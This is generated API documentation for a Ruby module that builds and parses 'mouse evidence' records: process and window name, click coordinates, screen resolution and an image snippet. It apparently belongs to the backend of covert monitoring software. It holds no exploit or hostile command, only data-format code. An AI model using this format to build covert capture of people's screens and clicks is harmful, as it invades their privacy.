Module: RCS::MouseEvidence

Defined in:

lib/rcs-common/evidence/mouse.rb

Constant Summary

MOUSE_VERSION =

2009040201

Instance Method Summary

• #additional_header ⇒ Object
• #content ⇒ Object
• #decode_additional_header(data) ⇒ Object
• #decode_content(common_info, chunks) {|info| ... } ⇒ Object
• #generate_content ⇒ Object

Instance Method Details

#additional_header ⇒ Object

# File 'lib/rcs-common/evidence/mouse.rb', line 18

def additional_header
  process_name = 'Finder'.to_utf16le_binary
  window_name = ''.to_utf16le_binary
  x = 10
  y = 20
  width = 1280
  height = 800
  header = StringIO.new
  header.write [MOUSE_VERSION, process_name.size, window_name.size, x, y, width, height].pack("I*")
  header.write process_name
  header.write window_name

  header.string
end

#content ⇒ Object

# File 'lib/rcs-common/evidence/mouse.rb', line 9

def content
  path = File.join(File.dirname(__FILE__), 'content', 'mouse', '00' + (rand(4) + 1).to_s + '.jpg')
  File.open(path, 'rb') {|f| f.read }
end

#decode_additional_header(data) ⇒ Object

Raises:

• (EvidenceDeserializeError)

# File 'lib/rcs-common/evidence/mouse.rb', line 33

def decode_additional_header(data)
  raise EvidenceDeserializeError.new("incomplete MOUSE") if data.nil? or data.bytesize == 0

  binary = StringIO.new data

  version, process_name_len, window_name_len = binary.read(12).unpack('I*')
  raise EvidenceDeserializeError.new("invalid log version for MOUSE") unless version == MOUSE_VERSION

  x, y, width, height = binary.read(16).unpack('I*')

  ret = Hash.new
  ret[:data] = Hash.new if ret[:data].nil?
  ret[:data][:program] = binary.read(process_name_len).utf16le_to_utf8
  ret[:data][:window] = binary.read(window_name_len).utf16le_to_utf8
  ret[:data][:x] = x
  ret[:data][:y] = y
  ret[:data][:resolution] = "#{width} x #{height}"
  return ret
end

#decode_content(common_info, chunks) {|info| ... } ⇒ Object

Yields:

• (info)

# File 'lib/rcs-common/evidence/mouse.rb', line 53

def decode_content(common_info, chunks)
  info = Hash[common_info]
  info[:data] = Hash.new if info[:data].nil?
  info[:grid_content] = chunks.first
  yield info if block_given?
  :delete_raw
end

#generate_content ⇒ Object

# File 'lib/rcs-common/evidence/mouse.rb', line 14

def generate_content
  [ content ]
end